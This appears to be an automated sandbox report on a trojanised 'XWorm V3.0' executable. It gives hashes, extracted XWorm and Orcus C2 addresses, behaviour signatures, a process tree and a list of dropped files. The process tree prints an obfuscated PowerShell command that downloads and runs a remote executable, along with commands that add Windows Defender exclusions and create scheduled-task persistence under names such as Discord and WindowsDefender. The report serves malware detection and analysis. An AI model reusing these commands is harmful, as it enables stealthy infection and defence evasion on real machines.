Analysis

  • max time kernel
    144s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  • submitted
    16-07-2024 01:03

General

  • Target

    XWorm V3.0.exe

  • Size

    19.3MB

  • MD5

    d7e85bc99cb79b98d64a6d4b8b7d041b

  • SHA1

    137f70c449be88103e4f1abfa80658ccbd9ba3f9

  • SHA256

    8dd83abb25a341413e009b4b6b0b12582382d99bc2f3d2b0d07c95bf3b8c0c81

  • SHA512

    c35a74526edee423254a4335946a9d447c95a31a4acb9923ee667d074f9c4f84d0d5f6cf22bc6a23012ebe04ef4d6ad43bd2e55dc287d4dfe52a5d9b71f8d4f1

  • SSDEEP

    393216:JZgqzDlLO/uc+9bPugF7cp4rTKiSVbafhkCvBeLfhfzm:JqctO/k9bPugypcKtVGhkckfBy

Malware Config

Extracted

Family

xworm

C2

147.185.221.18:43279

147.185.221.18:47186

147.185.221.18:45497

147.185.221.18:24123

147.185.221.18:41609

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    Discord.exe

Extracted

Family

orcus

C2

147.185.221.18:43279

Mutex

1a3206b13a7141d7a10982ddf15a2503

Attributes
  • autostart_method

    Registry

  • enable_keylogger

    false

  • install_path

    %programfiles%\Orcus\Orcus.exe

  • reconnect_delay

    10000

  • registry_keyname

    Orcus

  • taskscheduler_taskname

    Orcus

  • watchdog_path

    AppData\OrcusWatchdog.exe

Signatures

  • Detect Xworm Payload 17 IoCs
  • Orcus

    Orcus is a Remote Access Trojan that is being sold on underground forums.

  • Orcus main payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Orcurs Rat Executable 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 21 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Drops startup file 9 IoCs
  • Executes dropped EXE 19 IoCs
  • Loads dropped DLL 2 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 6 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 3 IoCs
  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 39 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\XWorm V3.0.exe
    "C:\Users\Admin\AppData\Local\Temp\XWorm V3.0.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2064
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Roaming\XWorm_V3.0.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2920
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProf"i"le -Executio"n"Policy B"y"pass -Window"S"tyle Hidden -Co"m"mand "Inv"o"ke-W"e"bRequest -Uri 'https://github.com/GoldHourse/OPTIMIZER/raw/main/XWorm_V3.0.exe' -Ou"t"File 'XWorm_V3.0.exe';" "Start-Process -FilePath 'XWorm_V3.0.exe'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2708
    • C:\Users\Admin\AppData\Roaming\XWorm V3.0.exe
      "C:\Users\Admin\AppData\Roaming\XWorm V3.0.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2820
      • C:\Users\Admin\AppData\Roaming\1.exe
        "C:\Users\Admin\AppData\Roaming\1.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2912
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\1.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2908
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:984
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Discord.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:940
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:588
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\ProgramData\Discord.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1540
      • C:\Users\Admin\AppData\Roaming\2.exe
        "C:\Users\Admin\AppData\Roaming\2.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2808
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\2.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2948
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '2.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2464
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:396
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2968
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2996
      • C:\Users\Admin\AppData\Roaming\3.exe
        "C:\Users\Admin\AppData\Roaming\3.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2780
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\3.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2664
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '3.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:832
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\discord.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2040
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'discord.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1784
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "discord" /tr "C:\Users\Admin\AppData\Roaming\discord.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:568
      • C:\Users\Admin\AppData\Roaming\4.exe
        "C:\Users\Admin\AppData\Roaming\4.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2628
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\4.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2728
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '4.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2256
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Discord_Update.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2296
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord_Update.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2576
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord_Update" /tr "C:\Users\Admin\AppData\Roaming\Discord_Update.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1480
      • C:\Users\Admin\AppData\Roaming\5.exe
        "C:\Users\Admin\AppData\Roaming\5.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:864
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\5.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2788
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '5.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2216
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WindowsDefender.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2680
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsDefender.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2352
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsDefender" /tr "C:\Users\Admin\AppData\Roaming\WindowsDefender.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1296
      • C:\Users\Admin\AppData\Roaming\6.exe
        "C:\Users\Admin\AppData\Roaming\6.exe"
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • Suspicious use of WriteProcessMemory
        PID:2596
        • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\9smatpdu.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3020
          • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES27EC.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC27EB.tmp"
            5⤵
            PID:608
        • C:\Program Files\Orcus\Orcus.exe
          "C:\Program Files\Orcus\Orcus.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:276
      • C:\Users\Admin\AppData\Roaming\7.exe
        "C:\Users\Admin\AppData\Roaming\7.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2976
        • C:\Users\Admin\AppData\Roaming\7.exe
          "C:\Users\Admin\AppData\Roaming\7.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2480
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "108196391931600450721056642541075254560-183627000210658113384898043071169406501"
    1⤵
    PID:2976
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {C41B241E-874D-426D-B543-92B88FCF6476} S-1-5-21-2212144002-1172735686-1556890956-1000:MVFYZPLM\Admin:Interactive:[1]
    1⤵
    PID:2928
    • C:\Users\Admin\AppData\Roaming\Discord_Update.exe
      C:\Users\Admin\AppData\Roaming\Discord_Update.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3040
    • C:\Users\Admin\AppData\Roaming\discord.exe
      C:\Users\Admin\AppData\Roaming\discord.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1636
    • C:\Users\Admin\AppData\Roaming\WindowsDefender.exe
      C:\Users\Admin\AppData\Roaming\WindowsDefender.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1412
    • C:\Users\Admin\AppData\Roaming\svhost.exe
      C:\Users\Admin\AppData\Roaming\svhost.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2096
    • C:\Users\Admin\AppData\Roaming\Discord_Update.exe
      C:\Users\Admin\AppData\Roaming\Discord_Update.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2952
    • C:\Users\Admin\AppData\Roaming\discord.exe
      C:\Users\Admin\AppData\Roaming\discord.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2976
    • C:\Users\Admin\AppData\Roaming\WindowsDefender.exe
      C:\Users\Admin\AppData\Roaming\WindowsDefender.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1700
    • C:\Users\Admin\AppData\Roaming\svhost.exe
      C:\Users\Admin\AppData\Roaming\svhost.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2616

Downloads

        • C:\Program Files\Orcus\Orcus.exe.config

          Filesize

          357B

          MD5

          a2b76cea3a59fa9af5ea21ff68139c98

          SHA1

          35d76475e6a54c168f536e30206578babff58274

          SHA256

          f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839

          SHA512

          b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad

        • C:\Users\Admin\AppData\Local\Temp\9smatpdu.dll

          Filesize

          76KB

          MD5

          f06a94a34022abd760b14c7f9712edf3

          SHA1

          736b33bcaac66b9de20abc73913583052b247a1d

          SHA256

          670d45bff8bb640d0d0945c42630cd5a385477c1d0b02789f328bbca71df793b

          SHA512

          6539282dcd9d54509c4967d5e0ec05cce0f32c9921ffae50d314f0e0c4e006e5a6efd30e30146a54405dfe1088aee8c6a0d39febc4796dc8639c1eaf6184d856

        • C:\Users\Admin\AppData\Local\Temp\RES27EC.tmp

          Filesize

          1KB

          MD5

          3f567e100b2e5a14bdc295b9d0b2aa87

          SHA1

          7aa71b21920187bc186d13dee800a67b988cbbe4

          SHA256

          07c79cb173f955df36e220279145c43f27c3ec70c50b551f198b429d62f13673

          SHA512

          64fd7de9b06af5650c349b249bbb3a4d7edf28f4d898bcb1eba976abcc191adb390261ebd6f831e64e1821333daeb94016785c2164f86f30b8be77ec4b1181dc

        • C:\Users\Admin\AppData\Roaming\1.exe

          Filesize

          78KB

          MD5

          96de307a20d164e286dc6f9d576243ac

          SHA1

          a04ea83541d793242a8ac298193228b180b45ac9

          SHA256

          ccf5c48559a9010f280a669e104e0a7158c8f0f11326064687e7c04fcbc1b282

          SHA512

          3a8c7db311a078b15bf5e486f04d42f22fb2d2430339e5fbe94543c8e39eb8829eee2befbcf89b93c0db24fd46c1bda1190bf122a0476a1dc00854bc02c2864c

        • C:\Users\Admin\AppData\Roaming\2.exe

          Filesize

          61KB

          MD5

          f9c401f094879541dc43fe2e1be6598b

          SHA1

          4164f2b5b0d538b31a6bd98943bdb4f00950c5b8

          SHA256

          93c8db705f405b9145677f69b4a396369c39a04cf87502ea94ac56e373267aac

          SHA512

          a70d9be58c7b873a7b91054e3290a23bba0e47a207494d84a0dffbbe310c5791fe1038e506d183d891fd3a39b0dd1a55869b751a735fa9923fe9ae4ab8c52909

        • C:\Users\Admin\AppData\Roaming\3.exe

          Filesize

          98KB

          MD5

          22f92d02b03f4c7027e27b8e9dc8c5a9

          SHA1

          1d0df57ce658e213ff66b3e619620e4b2b312cb6

          SHA256

          3134b8ccd158b31c28d489023ea9d62691d563f9b9dd107e8e64dda6088a6199

          SHA512

          dc0a52a1fdc61b5c82cb1886a7e67a7b7d6fc309fe7e75fcc2588b6891902fb52271521a432a59a2e9bc93e6df82b5a4fb1d5a5715de808808734099985f3750

        • C:\Users\Admin\AppData\Roaming\4.exe

          Filesize

          171KB

          MD5

          3d5ea2f503c390dd7285b72915dc366f

          SHA1

          f62b85a917d7f98469c040af63132d5aee7a375b

          SHA256

          017471b298fac8758de30a3ced121531a75a67670bc2e7d581c56606b6a337f1

          SHA512

          d005b12a9e18edc333af4b839ca4f611946df130685035a4c6eeb9f3c3f880ce13654f33c909d02a232045c9628e6df0626cd14b9e87327ba57591dee9bb98c9

        • C:\Users\Admin\AppData\Roaming\5.exe

          Filesize

          72KB

          MD5

          1f7c0615295d2c2c80a34738617a62dd

          SHA1

          846329a7fc0f9aca346909decf282244cb6701e0

          SHA256

          11e622baa1481b2cc65c69b2cd93fa62e884dc33a680f907f6b079c735b790fe

          SHA512

          827d639f43524ca216fdec489c04c6a1fb01c3f1e6873b17eb61e018f0317a395bb64a242915b89696a3487990cf854420dba130e94e430e180cb316d71c4244

        • C:\Users\Admin\AppData\Roaming\6.exe

          Filesize

          903KB

          MD5

          065d393fc49f68ddb101aec6b97bee49

          SHA1

          c3844c19b60ea39eade055660a3dd3934e0a2d96

          SHA256

          125634fb6ef6029bad99024cd4c8f0838cb086d4f071200b56bd58eec6e74127

          SHA512

          1f72124b73f7670db5c21ca23d0835731c0001471551e17cc19a4c356db3a03a43eaf07df2b2a67ff2f438e3aa6b1dd01bbb937600b75033d7381339e8f0474e

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          7KB

          MD5

          881135dd2a0378d3fc1c00d5ac23fd9d

          SHA1

          83b781e8571e84998b0d7937eeb7a8923a1fdee7

          SHA256

          6e32be05a21ed780ae2bb4e86c2ae4a10b8fbd3021920eeb2b0b434bfb822bb7

          SHA512

          b245c3870d890fe5fc8814a38e7c29432ace397cf4a4d569c1daaad8e8821c514497c243add91db56e40bab810f4cc4470697998512a657f6fcce482caec6724

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.lnk

          Filesize

          633B

          MD5

          ebe35d6819eeaccef40578d2e5b51263

          SHA1

          45dc56fff59a1a5d8f3131eec627c2c17cf8bfbb

          SHA256

          8f829ff745d96375b8d8b64097fee3fe477ea18ede3f3abc549986ce27b81e6c

          SHA512

          b1ab95dafca33fdbd2f0718046026a6314f512177a3dd39bba9fa5742a1cb29d200e0cb8c2f8382bcabf896af64f6c1e6c06ee736015c85bb7031b948804e250

        • C:\Users\Admin\AppData\Roaming\XWorm V3.0.exe

          Filesize

          19.2MB

          MD5

          1b10ac7f9574310ec8d3f4816c2832d9

          SHA1

          daba65e48b4f8b2c1b61b6cf91fc6e2f36fe1892

          SHA256

          4990c4e127c5ce86306dc3774862034cdc54a7b5c31fb536179faacf4adbd8b8

          SHA512

          f5123ece8328e4ca2340deecf3386e0b3b926ec2be94625970b1f2ed1f04d81effb2bddeeafdf47fc2266d2e9d823a0a6aa431eb0287c76df933194b9de02270

        • C:\Users\Admin\AppData\Roaming\XWorm_V3.0.bat

          Filesize

          456B

          MD5

          3a027298558ab19b65d90b9f560f6df2

          SHA1

          816938f082f384e2d8c750bc08deea4f13bd4b8c

          SHA256

          66b54aca4d5098b2491173976f050b7bb44baa98e1fe522f8ba12f4caa0a2a15

          SHA512

          dc78cb3f9654ea27066b74fe0a83b2158508c1f6931f71b9f36edc21a263bd51afda73ea2879c20510e637b824b848549a8af544d86fee22056c5328d1ca9429

        • \??\PIPE\srvsvc

          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

        • \??\c:\Users\Admin\AppData\Local\Temp\9smatpdu.0.cs

          Filesize

          208KB

          MD5

          2b14ae8b54d216abf4d228493ceca44a

          SHA1

          d134351498e4273e9d6391153e35416bc743adef

          SHA256

          4e1cc3da1f7bf92773aae6cffa6d61bfc3e25aead3ad947f6215f93a053f346c

          SHA512

          5761b605add10ae3ef80f3b8706c8241b4e8abe4ac3ce36b7be8a97d08b08da5a72fedd5e976b3c9e1c463613a943ebb5d323e6a075ef6c7c3b1abdc0d53ac05

        • \??\c:\Users\Admin\AppData\Local\Temp\9smatpdu.cmdline

          Filesize

          349B

          MD5

          56334685c817f5ee77414eae74b33882

          SHA1

          bd099b564a7198036b2748c0606730215ba509e7

          SHA256

          7e6c42151298dbe7360bf31a3a61dcc44f9cd775d335803e0a15857da32435af

          SHA512

          76eda4a7ef17daf583d9d96c1ecee7de71b04de3aa03ef526a70c798404d13b07ecb1c38129d0531aea2728b97914b20049252f0b8fe465ff9066f1c82c18a6c

        • \??\c:\Users\Admin\AppData\Local\Temp\CSC27EB.tmp

          Filesize

          676B

          MD5

          2289bb0eeacea620909b0e7970a7fe7e

          SHA1

          65533a5391eb46ab05e58b2c9193cb27606cf7a2

          SHA256

          b0fba38ecbd5c35a1dec53353da042a70caea9221a58a1239c8d60b6f01878c8

          SHA512

          41050641949471591b748ffaaa7a8cec336b42c32b1b9ac7c1a8b7ce8ed3e80ae2f555d72ed44a33b8aecc82d694dd0395058bc4d3960beb1568aa92cd55fa96

        • \Users\Admin\AppData\Local\Temp\_MEI29762\python310.dll

          Filesize

          1.4MB

          MD5

          69d4f13fbaeee9b551c2d9a4a94d4458

          SHA1

          69540d8dfc0ee299a7ff6585018c7db0662aa629

          SHA256

          801317463bd116e603878c7c106093ba7db2bece11e691793e93065223fc7046

          SHA512

          8e632f141daf44bc470f8ee677c6f0fdcbcacbfce1472d928576bf7b9f91d6b76639d18e386d5e1c97e538a8fe19dd2d22ea47ae1acf138a0925e3c6dd156378

        • \Users\Admin\AppData\Roaming\7.exe

          Filesize

          17.7MB

          MD5

          dacf5de38fc04e84539fbb83324e6718

          SHA1

          b9a64a1e06dda01619b53bbee67e0b0c0278b589

          SHA256

          c8ba652f285cbf4e5af985b5a001cec86afa916236f930500d6ea7c206a1620e

          SHA512

          4d42b6d8196f8f8d0f38f9935ad05cd439b7f0a3f5b97dbb914bc083f6e78a9a748647545989b98e7c6df2293de50ce09afdec1e4a03a1a6d70aa778f1180626
